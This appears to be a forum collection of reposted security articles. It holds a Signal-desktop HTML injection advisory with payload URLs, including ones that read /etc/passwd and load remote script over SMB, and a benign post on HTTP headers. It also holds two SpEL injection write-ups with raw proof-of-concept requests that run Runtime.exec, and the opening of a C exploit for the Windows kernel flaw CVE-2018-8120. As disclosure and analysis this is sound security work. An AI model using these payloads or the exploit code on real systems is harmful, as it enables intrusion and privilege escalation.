signal-desktop HTML tag injection advisory Title: Signal-desktop HTML tag injection Date Published: 2018-05-14 Last Update: 2018-05-14 CVE Name: CVE-2018-10994 Class: Code injection Remotely Exploitable: Yes Locally Exploitable: No Vendors contacted: Signal.org Vulnerability Description: Signal-desktop is the standalone desktop version of the secure Signal messenger. This software is vulnerable to remote code execution from a malicious contact, by sending a specially crafted message containing HTML code that is injected into the chat windows (Cross-site scripting). Vulnerable Packages: Signal-desktop messenger v1.7.1 Signal-desktop messenger v1.8.0 Signal-desktop messenger v1.9.0 Signal-desktop messenger v1.10.0 Originally found in v1.9.0 and v1.10.0, but after reviewing the source code the aforementioned are the impacted versions. Solution/Vendor Information/Workaround Upgrade to Signal-desktop messenger v1.10.1 or v1.11.0-beta.3 For safer communications on desktop systems, please consider the use of a safer end-point client like PGP or GnuPG instead. Credits: This vulnerability was found and researched by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor), with assistance from Javier Lorenzo Carlos Smaldone (@mis2centavos). Technical Description – Exploit/Concept Code While discussing a XSS vulnerability on a website using the Signal-desktop messenger, it was found that the messenger software also displayed a code-injection vulnerability while parsing the affected URLs. The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically the <img> and <iframe> tags can be used to include remote or local resources. For example, the use of iframes enables full code execution, allowing an attacker to download/upload files, information, etc. The <script> tag was also found injectable. In the Windows operative system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in a SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>. The included JavaScript code is then executed automatically, without any interaction needed from the user. The vulnerability can be triggered in the signal-desktop client by sending a specially crafted message. Examples: Show an iframe with some text: http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E Display content of user’s own /etc/passwd file: http://hacktheplanet/?p=%3d%3Ciframe%20src=/etc/passwd%3E Include and execute a remote JavaScript file (for Windows clients): http://hacktheplanet/?p=%3d%3Ciframe%20src=\\XXX.XXX.XXX.XXX\Temp\test.html%3E Show a base64-encoded image (bypass “click to download image”): http://hacktheplanet/?p=%3Cimg%20src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="%3e Timeline: 2018-05-10 18:45 GMT-3: vuln discovered 2018-05-11 13:03 GMT-3: emailed Signal security team 2018-05-11 15:02 GMT-3: reply from Signal: vuln confirmed & patch ongoing 2018-05-11 16:12 GMT-3: patch committed 2018-05-11 18:00 GMT-3: signal-desktop update published 2018-05-14 18:00 GMT-3: public disclosure References: Patch: https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2…v1.11.0-beta.3 Writeup: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/ Sursa: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/advisory/
-
- 1
-
-
The headers we don't want By Andrew Betts | May 10, 2018 If you want to learn more about headers, don’t miss Andrew’s talk at Altitude London on May 22. HTTP headers are an important way of controlling how caches and browsers process your web content. But many are used incorrectly or pointlessly, which adds overhead at a critical time in the loading of your page, and may not work as you intended. In this first of a series of posts about header best practice, we’ll look at unnecessary headers. Most developers know about and depend on a variety of HTTP headers to make their content work. Those that are best known include Content-Type and Content-Length, which are both almost universal. But more recently, headers such as Content-Security-Policy and Strict-Transport-Security have started to improve security, and Link rel=preload headers to improve performance. Few sites use these, despite their wide support across browsers. At the same time, there are lots of headers that are hugely popular but aren’t new and aren’t actually all that useful. We can prove this using HTTP Archive, a project run by Google and sponsored by Fastly that loads 500,000 websites every month using WebPageTest, and makes the results available in BigQuery. From the HTTP Archive data, here are the 30 most popular response headers (based on the number of domains in the archive which are serving each header), and roughly how useful each one is: Header name Requests Domains Status date 48779277 535621 Required by protocol content-type 47185627 533636 Usually required by browser server 43057807 519663 Unnecessary content-length 42388435 519118 Useful last-modified 34424562 480294 Useful cache-control 36490878 412943 Useful etag 23620444 412370 Useful content-encoding 16194121 409159 Required for compressed content expires 29869228 360311 Unnecessary x-powered-by 4883204 211409 Unnecessary pragma 7641647 188784 Unnecessary x-frame-options 3670032 105846 Unnecessary access-control-allow-origin 11335681 103596 Useful x-content-type-options 11071560 94590 Useful link 1212329 87475 Useful age 7401415 59242 Useful x-cache 5275343 56889 Unnecessary x-xss-protection 9773906 51810 Useful strict-transport-security 4259121 51283 Useful via 4020117 47102 Unnecessary p3p 8282840 44308 Unnecessary expect-ct 2685280 40465 Useful content-language 334081 37927 Debatable x-aspnet-version 676128 33473 Unnecessary access-control-allow-credentials 2804382 30346 Useful x-robots-tag 179177 24911 Not relevant to browsers x-ua-compatible 489056 24811 Unnecessary access-control-allow-methods 1626129 20791 Useful access-control-allow-headers 1205735 19120 Useful Let’s look at the unnecessary headers and see why we don’t need them, and what we can do about it. Vanity (server, x-powered-by, via) You may be very proud of your choice of server software, but most people couldn’t care less. At worst, these headers might be divulging sensitive data that makes your site easier to attack. Server: apache X-Powered-By: PHP/5.1.1 Via: 1.1 varnish, 1.1 squid RFC7231 allows for servers to include a Server header in the response, identifying the software used to serve the content. This is most commonly a string like “apache” or “nginx”. While it’s allowed, it’s not mandatory, and offers very little value to either developers or end users. Nevertheless, this is the third most popular HTTP response header on the web today. X-Powered-By is the most popular header in our list that is not defined in any standard, and has a similar purpose, though normally refers to the application platform that sits behind the web server. Common values include “ASP.net”, “PHP” and “Express”. Again this isn’t providing any tangible benefit and is taking up space. More debatable perhaps is Via, which is required (by RFC7230) to be added to the request by any proxy through which it passes to identify the proxy. This can be the proxy’s hostname, but is more likely to be a generic identifier like “vegur”, “varnish”, or “squid”. Removing (or not setting) this header on a request can cause proxy forwarding loops. However, interestingly it is also copied into the response on the way back to the browser, and here it’s just informational and no browsers do anything with it, so it’s reasonably safe to get rid of it if you want to. Deprecated standards (P3P, Expires, X-Frame-Options, X-UA-Compatible) Another category of headers is those that do have an effect in the browser but are not (or are no longer) the best way of achieving that effect. P3P: cp="this is not a p3p policy" Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Frame-Options: SAMEORIGIN X-UA-Compatible: IE=edge P3P is a curious animal. I had no idea what this was, and even more curiously, one of the most common values is “this is not a p3p policy”. Well, is it, or isn’t it? The story here goes back to an attempt to standardise a machine readable privacy policy. There was disagreement on how to surface the data in browsers, and only one browser ever implemented the header - Internet Explorer. Even in IE though, P3P didn’t trigger any visual effect to the user; it just needs to be present to permit access to third party cookies in iframes. Some sites even set a non-conforming P3P policy like the one above – even though doing so is on shaky legal ground. Needless to say, reading third party cookies is generally a bad idea, so if you don’t do it, then you won’t need to set a P3P header! Expires is almost unbelievably popular, considering that Cache-Control has been preferred over Expires for 20 years. Where a Cache-Control header includes a max-age directive, any Expires header on the same response will be ignored. But there are a massive number of sites setting both, and the Expires header is most commonly set to Thu, 01 Dec 1994 16:00:00 GMT, because you want your content to not be cached and copy-pasting the example date from the spec is certainly one way of doing that. But there is simply no reason to do this. If you have an Expires header with a date in the past, replace it with: Cache-Control: no-store, private (no-store is a very strong directive not to write the content to persistent storage, so depending on your use case you might actually prefer no-cache for better performance, for example when using back/forward navigation or resuming hibernated tabs) Some of the tools that audit your site will tell you to add an X-Frame-Options header with a value of ‘SAMEORIGIN’. This tells browsers that you are refusing to be framed by another site, and is generally a good defense against clickjacking. However, the same effect can be achieved, with more consistent support and more robust definition of behaviour, by doing: Content-Security-Policy: frame-ancestors 'self' This has the additional benefit of being part of a header (CSP) which you should have anyway for other reasons (more on that later). So you can probably do without X-Frame-Options these days. Finally, back in their IE9 days, Microsoft introduced ‘compatibility view’, and would potentially render a page using the IE8 or IE7 engine, even when the user was browsing with IE9, if the browser thought that the page might require the earlier version to work properly. Those heuristics were not always correct, and developers were able to override them by using an X-UA-Compatible header or meta tag. In fact, this increasingly became a standard part of frameworks like Bootstrap. These days, this header achieves very little - very few people are using browsers that would understand it, and if you are actively maintaining your site it’s very unlikely that you are using technologies that would trigger compatibility view. Debug data (X-ASPNet-Version, X-Cache) It’s kind of astonishing that some of the most popular headers in common use are not in any standard. Essentially this means that somehow, thousands of websites seem to have spontaneously agreed to use a particular header in a particular way. X-Cache: HIT X-Request-ID: 45a336c7-1bd5-4a06-9647-c5aab6d5facf X-ASPNet-Version: 3.2.32 X-AMZN-RequestID: 0d6e39e2-4ecb-11e8-9c2d-fa7ae01bbebc In reality, these ‘unknown’ headers are not separately and independently minted by website developers. They are typically artefacts of using particular server frameworks, software or specific vendors’ services (in this example set, the last header is a common AWS header). X-Cache, in particular, is actually added by Fastly (other CDNs also do this), along with other Fastly-related headers like X-Cache-Hits and X-Served-By. When debugging is enabled, we add even more, such as Fastly-Debug-Path and Fastly-Debug-TTL. These headers are not recognised by any browser, and removing them makes no difference to how your pages are rendered. However, since these headers might provide you, the developer, with useful information, you might like to keep a way to turning them on. Misunderstandings (Pragma) I didn’t expect to be in 2018 writing a post about the Pragma header, but according to our HTTP Archive data it’s still the 11th most popular. Not only was Pragma deprecated as long ago as 1997, but it was never intended to be a response header anyway - as specified, it only has meaning as part of a request. Pragma: no-cache Nevertheless it’s use as a response header is so widespread that some browsers recognise it in this context as well. Today the probability that your response will transit a cache that understands Pragma in a response context, and doesn’t understand Cache-Control, is vanishingly small. If you want to make sure that something isn’t cached, Cache-Control: no-store, private is all you need. Non-Browser (X-Robots-Tag) One header in our top 30 is a non-browser header. X-Robots-Tag is intended to be consumed by a crawler, such as Google or Bing’s bots. Since it has no meaning to a browser, you could choose to only set it when the requesting user-agent is a crawler. Equally, you might decide that this makes testing harder, or perhaps that it violates the terms of service of the search engine. Bugs Finally, it’s worth finishing on an honourable mention for simple bugs. In a request, a Host header makes sense, but seeing it on a response probably means your server is misconfigured somehow (I’d love to know how, exactly). Nevertheless, 68 domains in HTTP archive are returning a Host header in their responses. Removing headers at the edge Fortunately, if your site is behind Fastly, removing headers is pretty easy using VCL. It makes sense that you might want to keep the genuinely useful debug data available to your dev team, but hide it for public users, so that’s easily done by detecting a cookie or inbound HTTP header: unset resp.http.Server; unset resp.http.X-Powered-By; unset resp.http.X-Generator; if (!req.http.Cookie:debug && !req.http.Debug) { unset resp.http.X-Amzn-RequestID; unset resp.http.X-Cache; } In the next post in this series, I’ll be talking about best practices for headers that you should be setting, and how to enable them at the edge Author Andrew Betts |Web Developer and Principal Developer Advocate Sursa: https://www.fastly.com/blog/headers-we-dont-want
-
Beware of the Magic SpEL(L) – Part 2 (CVE-2018-1260) Written by Philippe Arteau On Tuesday, we released the details of RCE vulnerability affecting Spring Data (CVE-2018-1273). We are now repeating the same exercise for a similar RCE vulnerability in Spring Security OAuth2 (CVE-2018-1260). We are going to present the attack vector, its discovery method and the conditions required for exploitation. This vulnerability also has similarities with another vulnerability disclosed in 2016. The resemblance will be discussed in the section where we review the fix. Analyzing a potential vulnerability It all started by the report of the bug pattern SPEL_INJECTION by Find Security Bugs. It reported the use of SpelExpressionParser.parseExpression() with a dynamic parameter, the same API used in the previous vulnerability we had found. The expression parser is used to parse expressions placed between curly brackets “${…}”. public SpelView(String template) { this.template = template; this.prefix = new RandomValueStringGenerator().generate() + "{"; this.context.addPropertyAccessor(new MapAccessor()); this.resolver = new PlaceholderResolver() { public String resolvePlaceholder(String name) { Expression expression = parser.parseExpression(name); //Expression parser Object value = expression.getValue(context); return value == null ? null : value.toString(); } }; } 1 2 3 4 5 6 7 8 9 10 11 12 public SpelView(String template) { this.template = template; this.prefix = new RandomValueStringGenerator().generate() + "{"; this.context.addPropertyAccessor(new MapAccessor()); this.resolver = new PlaceholderResolver() { public String resolvePlaceholder(String name) { Expression expression = parser.parseExpression(name); //Expression parser Object value = expression.getValue(context); return value == null ? null : value.toString(); } }; } The controller class WhitelabelApprovalEndpoint uses this SpelView class to build the approval page for OAuth2 authorization flow. The SpelView class evaluates the string named “template” – see code below – as a Spring Expression. @RequestMapping("/oauth/confirm_access") public ModelAndView getAccessConfirmation(Map<String, Object> model, HttpServletRequest request) throws Exception { String template = createTemplate(model, request); if (request.getAttribute("_csrf") != null) { model.put("_csrf", request.getAttribute("_csrf")); } return new ModelAndView(new SpelView(template), model); //template variable is a SpEL } 1 2 3 4 5 6 7 8 @RequestMapping("/oauth/confirm_access") public ModelAndView getAccessConfirmation(Map<String, Object> model, HttpServletRequest request) throws Exception { String template = createTemplate(model, request); if (request.getAttribute("_csrf") != null) { model.put("_csrf", request.getAttribute("_csrf")); } return new ModelAndView(new SpelView(template), model); //template variable is a SpEL } Following the methods createTemplate() and createScopes(), we can see that the attribute “scopes” is appended to the HTML template which will be evaluated as an expression. The only model parameter bound to the template is a CSRF token. However, the CSRF token will not be under the control of a remote user. protected String createTemplate(Map<String, Object> model, HttpServletRequest request) { String template = TEMPLATE; if (model.containsKey("scopes") || request.getAttribute("scopes") != null) { template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", ""); } [...] private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) { StringBuilder builder = new StringBuilder("<ul>"); @SuppressWarnings("unchecked") Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request .getAttribute("scopes")); //Scope attribute loaded here for (String scope : scopes.keySet()) { String approved = "true".equals(scopes.get(scope)) ? " checked" : ""; String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved) .replace("%denied%", denied); builder.append(value); } builder.append("</ul>"); return builder.toString(); } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 protected String createTemplate(Map<String, Object> model, HttpServletRequest request) { String template = TEMPLATE; if (model.containsKey("scopes") || request.getAttribute("scopes") != null) { template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", ""); } [...] private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) { StringBuilder builder = new StringBuilder("<ul>"); @SuppressWarnings("unchecked") Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request .getAttribute("scopes")); //Scope attribute loaded here for (String scope : scopes.keySet()) { String approved = "true".equals(scopes.get(scope)) ? " checked" : ""; String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved) .replace("%denied%", denied); builder.append(value); } builder.append("</ul>"); return builder.toString(); } At this point, we are unsure if the scopes attribute can be controlled by the remote user. While attribute (req.getAttribute(..)) represents session values stored server-side, scope is an optional parameter part of OAuth2 flow. The parameter might be accessible to the user, saved to the server-side attributes and finally loaded into the previous template. After some research in the documentation and some manual tests, we found that “scope” is a GET parameter part of the implicit OAuth2 flow. Therefore, the implicit mode would be required for our vulnerable application. Proof-of-Concept and Limitations When testing our application, we realized that the scopes were validated against a scopes whitelist defined by the user/client. If this whitelist is configured, we can’t be creative with the parameter scope. If the scopes are simply not defined, no validation is applied to the name of the scopes. This limitation will likely make most Spring OAuth2 applications safe. This first request made used the scope “${1338-1}”, see picture below. Based on the response, we now have a confirmation that the scope parameter’s value can reach the SpelView expression evaluation. We can see in the resulting HTML multiples instances of the string “scope.1337”. Pushing the probe value ${1338-1} A second test was made using the expression “${T(java.lang.Runtime).getRuntime().exec(“calc.exe”)}” to verify that the expressions are not limited to simple arithmetic operations. Simple proof-of-concept request spawning a calc.exe subprocess For easier reproduction, here is the raw HTTP request from the previous screenshot. Some characters – mainly curly brackets – were not supported by the web container and needed to be URL encoded in order to reach the application. { -> %7b POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me HTTP/1.1 Host: localhost:8080 Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38 Content-Type: application/x-www-form-urlencoded Accept: */* Content-Length: 0 1 2 3 4 5 6 POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me HTTP/1.1 Host: localhost:8080 Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38 Content-Type: application/x-www-form-urlencoded Accept: */* Content-Length: 0 Reviewing The Fix The solution chosen by the Pivotal team was to replace SpelView with a simpler view, with basic concatenation. This eliminates all possible paths to a SpEL evaluation. The first patch proposed introduced a potential XSS vulnerability, but luckily this was spotted before any release was made. The scope values are now properly escaped and free from any injection. More importantly, this solution improved the security of another endpoint: WhitelabelErrorEndpoint. The endpoint is also no longer uses a Spel View. It was found vulnerable to an identical attack vector in 2016. Spring-OAuth2 also used the SpelView class to build the error page. The interesting twist is that the template parameter was static, but the parameters bound to the template were evaluated recursively. This means that any value in the model could lead to a Remote Code Execution. Example with normal values Example with an expression included in the model This recursive evaluation was fixed by adding a random prefix to the expression boundary. The security of this template now relies on the randomness of 6 characters (62 possibilities to the power of 6). Some analysts were skeptical regarding this fix and raised the risk of a race condition if enough attempts are made. However, this is no longer a possibility since SpelView was also removed from this endpoint. The SpelView class is also present in Spring Boot. This implementation has a custom resolver to avoid recursion. This means that while the Spring-OAuth2 project no longer uses it, some other components, or proprietary applications, might have reused (copy-pasted) this utility class to save some time. For this reason, a new detector looking for SpelView was introduced in Find Security Bugs. The detector does not look for a specific package name because we assume that the application will likely have a copy of the SpelView class rather than a reference to Spring-OAuth2 or Spring Boot classes. Limitation & exploitability We encourage you to keep all your web applications’ dependencies up-to-date. If for any reason you must delay the last month’s updates, here are the specific conditions for exploitation: Spring OAuth2 in your dependency tree The users must have implicit flow enabled; it can be enabled along with other grant types The scope list needs to be empty (not explicitly set to one or more elements) The good news is that not all OAuth2 applications will be vulnerable. In order to specify arbitrary scopes, the user profile of the attacker needs to have an empty list of scopes. Conclusion This was the second and last article of the series on SpEL injection vulnerabilities. We hope it brought some light on this less frequent vulnerability class. As mentioned previously in Part 1, finding this vulnerability class in your own application is unlikely. It is more likely to come up in components similar to Spring-Data or Spring-OAuth. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability. This type of vulnerability hunting can be daunting because many code patterns cause indirection, making variable tracking harder. Kudos to Alvaros Muñoz, pyn3rd and Gal Goldshtein who reproduced the vulnerability and documented the flaw a few days after the official announcement made by Pivotal. Reference https://pivotal.io/security/cve-2018-1260: Official vulnerability announcement by Pivotal https://pivotal.io/security/cve-2016-4977: Similar vulnerability affecting Spring-OAuth2 https://docs.spring.io/spring/docs/3.0.x/reference/expressions.html: Spring Expression language capabilities http://find-sec-bugs.github.io/bugs.htm#SPEL_INJECTION: Bug description from Find Security Bugs Sursa: http://gosecure.net/2018/05/17/beware-of-the-magic-spell-part-2-cve-2018-1260/
-
Written by Philippe Arteau This February, we ran a Find Security Bugs scan on over at least one hundred components from the Spring Framework, including the core components (spring-core, spring-mvc) but also optional components (spring-data, spring-social, spring-oauth, etc.). From this exercise, we reported some vulnerabilities. In this blog post, we are going to give more details on a SpEL injection vulnerability. While some proof of concept code and exploitation details have already surfaced on Twitter, we will add a focus on how these vulnerabilities were found, followed by a thorough review of the proposed fix. Initial Analysis Our journey started when we noticed a suspicious expression evaluation in the MapDataBinder.java class, identified by the SPEL_INJECTION pattern as reported by Find Security Bugs. We discovered that the parameter propertyName came from a POST parameter upon form submission: public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { if (!isWritableProperty(propertyName)) { // <---Validation here throw new NotWritablePropertyException(type, propertyName); } StandardEvaluationContext context = new StandardEvaluationContext(); context.addPropertyAccessor(new PropertyTraversingMapAccessor(type, conversionService)); context.setTypeConverter(new StandardTypeConverter(conversionService)); context.setRootObject(map); Expression expression = PARSER.parseExpression(propertyName); // Expression evaluation 1 2 3 4 5 6 7 8 9 public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { if (!isWritableProperty(propertyName)) { // <---Validation here throw new NotWritablePropertyException(type, propertyName); } StandardEvaluationContext context = new StandardEvaluationContext(); context.addPropertyAccessor(new PropertyTraversingMapAccessor(type, conversionService)); context.setTypeConverter(new StandardTypeConverter(conversionService)); context.setRootObject(map); Expression expression = PARSER.parseExpression(propertyName); // Expression evaluation The sole protection against arbitrary expression evaluation appears to be the validation from the isWritableProperty method. Following the execution trace, it can be seen that the isWritableProperty method leads to the execution of getPropertyPath: @Override public boolean isWritableProperty(String propertyName) { try { return getPropertyPath(propertyName) != null; } catch (PropertyReferenceException e) { return false; } } 1 2 3 4 5 6 7 8 9 @Override public boolean isWritableProperty(String propertyName) { try { return getPropertyPath(propertyName) != null; } catch (PropertyReferenceException e) { return false; } } private PropertyPath getPropertyPath(String propertyName) { String plainPropertyPath = propertyName.replaceAll("\\[.*?\\]", ""); return PropertyPath.from(plainPropertyPath, type); } 1 2 3 4 5 private PropertyPath getPropertyPath(String propertyName) { String plainPropertyPath = propertyName.replaceAll("\\[.*?\\]", ""); return PropertyPath.from(plainPropertyPath, type); } We were about to review the PropertyPath.from() method in detail, but we realized a much easier bypass was possible: any value enclosed by brackets is removed and therefore the value is ignored. With this knowledge, the attack vector becomes clearer. We’re possibly able to submit a parameter name that would have the pattern “parameterName[T(malicious.class).exec(‘test’)]”. Building a Proof-of-concept An idea is nothing until it is put into action. When performing extensive code review, the creation of a proof of concept can sometimes be difficult. Luckily, it was not the case for this vulnerability. The first step was obviously constructing a vulnerable environment. We reused an example project located in spring-data-examples repository. The web project used an interface as a form which is required to reach this specific mapper. After identifying the form, we built the following request and sent it with an HTTP proxy. We were instantly greeted with the calculator spawn, confirming the exploitability of the module: POST /users?size=5 HTTP/1.1 Host: localhost:8080 Referer: http://localhost:8080/ Content-Type: application/x-www-form-urlencoded Content-Length: 110 Connection: close Upgrade-Insecure-Requests: 1 username=test&password=test&repeatedPassword=test&password<strong>[T(java.lang.Runtime).getRuntime().exec("calc")]</strong>=abc 1 2 3 4 5 6 7 8 9 POST /users?size=5 HTTP/1.1 Host: localhost:8080 Referer: http://localhost:8080/ Content-Type: application/x-www-form-urlencoded Content-Length: 110 Connection: close Upgrade-Insecure-Requests: 1 username=test&password=test&repeatedPassword=test&password<strong>[T(java.lang.Runtime).getRuntime().exec("calc")]</strong>=abc Simple proof of concept request spawning a calc.exe subprocess Reviewing The Fix A complete fix was made in the changeset associated to the bug id DATACMNS-1264. Here is why it can be considered really effective. While the attack vector presented previously relies on the side effect of a regex, another risk was also found in the implementation. The processed value was parsed twice; once for validation, and once again for execution. This is a subtle detail that is often overlooked when performing code review. An attacker could potentially exploit one subtitle difference between each implementation. This remains theoretical because we didn’t find any difference between both. The correction made by Pivotal also addresses this small double parsing risk that could have introduced a vulnerability in the future. In the first place, a more limited expression parser (SimpleEvaluationContext) was used. Then, a new validation of the types is integrated as the expression is loaded and executed. The isWritableProperty method was kept but the security of the mapper doesn’t rely on it anymore: public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { [...] EvaluationContext context = SimpleEvaluationContext // .forPropertyAccessors(new PropertyTraversingMapAccessor(type, conversionService)) // NEW Type validation .withConversionService(conversionService) // .withRootObject(map) // .build(); Expression expression = PARSER.parseExpression(propertyName); 1 2 3 4 5 6 7 8 9 public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { [...] EvaluationContext context = SimpleEvaluationContext // .forPropertyAccessors(new PropertyTraversingMapAccessor(type, conversionService)) // NEW Type validation .withConversionService(conversionService) // .withRootObject(map) // .build(); Expression expression = PARSER.parseExpression(propertyName); Is my application affected? Most Spring developers adopted Spring Boot to help dependency management. If this is your case, you should integrate the updates as soon as possible to avoid missing critical security patches, or growing your technical debt. If for any reason you must delay the last months’ updates, here are the specific conditions for the exploitation of this specific bug: Having spring-data-commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, in your dependency tree; At least one interface is used as a form (for example UserForm in the spring-data-examples project); Impacted forms from previous conditions are also accessible to attackers. What’s next? As the title implies, there will be a second part to this article, as a very similar vulnerability was identified in Spring OAuth2. We wanted to keep both vulnerabilities separate regardless of the similarities to avoid confusion with the exploitation conditions and the different payloads. You might be wondering where these SpEL injections are likely to be present, aside from the Spring Framework itself. It is unlikely that you will find web application logic directly using the SpEL API. Our offensive security team only recalls one occurrence of such conditions. The most probable case is reviewing other Spring components similar to data-commons. Additional checks can easily be added to your automated scanning tools. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability. As implicitly demonstrated in this article, while this tool can be effective, the confirmation of the exploitability still requires a minimal understanding of the vulnerability class and a small analysis. We are hoping that this blog was informative to you. Maybe, you will find a similar vulnerability yourself soon. References https://pivotal.io/security/cve-2018-1273: Official publication by Pivotal https://github.com/find-sec-bugs/find-sec-bugs: Static Analysis tool used to find the vulnerability Sursa: http://gosecure.net/2018/05/15/beware-of-the-magic-spell-part-1-cve-2018-1273/
-
cve-2018-8120 Details see: http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html #include <stdio.h> #include <tchar.h> #include <windows.h> #include <strsafe.h> #include <assert.h> #include <conio.h> #include <process.h> #include <winuser.h> #include "double_free.h" // Windows 7 SP1 x86 Offsets #define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread #define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process #define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId #define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink #define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token #define SYSTEM_PID 0x004 // SYSTEM Process PID #pragma comment(lib,"User32.lib") typedef struct _FARCALL { DWORD Offset; WORD SegSelector; } FARCALL, *PFARCALL; FARCALL Farcall = { 0 }; LONG Sequence = 1; LONG Actual[3]; _NtQuerySystemInformation NtQuerySystemInformation; LPCSTR lpPsInitialSystemProcess = "PsInitialSystemProcess"; LPCSTR lpPsReferencePrimaryToken = "PsReferencePrimaryToken"; FARPROC fpPsInitialSystemProcess = NULL; FARPROC fpPsReferencePrimaryToken = NULL; NtAllocateVirtualMemory_t NtAllocateVirtualMemory; void PopShell() { STARTUPINFO si = { sizeof(STARTUPINFO) }; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); CreateProcess("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); } FARPROC WINAPI KernelSymbolInfo(LPCSTR lpSymbolName) { DWORD len; PSYSTEM_MODULE_INFORMATION ModuleInfo; LPVOID kernelBase = NULL; PUCHAR kernelImage = NULL; HMODULE hUserSpaceKernel; LPCSTR lpKernelName = NULL; FARPROC pUserKernelSymbol = NULL; FARPROC pLiveFunctionAddress = NULL; NtQuerySystemInformation = (_NtQuerySystemInformation) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (NtQuerySystemInformation == NULL) { return NULL; } NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!ModuleInfo) { return NULL; } NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len); kernelBase = ModuleInfo->Module[0].ImageBase; kernelImage = ModuleInfo->Module[0].FullPathName; lpKernelName = (LPCSTR)ModuleInfo->Module[0].FullPathName + ModuleInfo->Module[0].OffsetToFileName; hUserSpaceKernel = LoadLibraryExA(lpKernelName, 0, 0); if (hUserSpaceKernel == NULL) { VirtualFree(ModuleInfo, 0, MEM_RELEASE); return NULL; } pUserKernelSymbol = GetProcAddress(hUserSpaceKernel, lpSymbolName); if (pUserKernelSymbol == NULL) { VirtualFree(ModuleInfo, 0, MEM_RELEASE); return NULL; } pLiveFunctionAddress = (FARPROC)((PUCHAR)pUserKernelSymbol - (PUCHAR)hUserSpaceKernel + (PUCHAR)kernelBase); FreeLibrary(hUserSpaceKernel); VirtualFree(ModuleInfo, 0, MEM_RELEASE); return 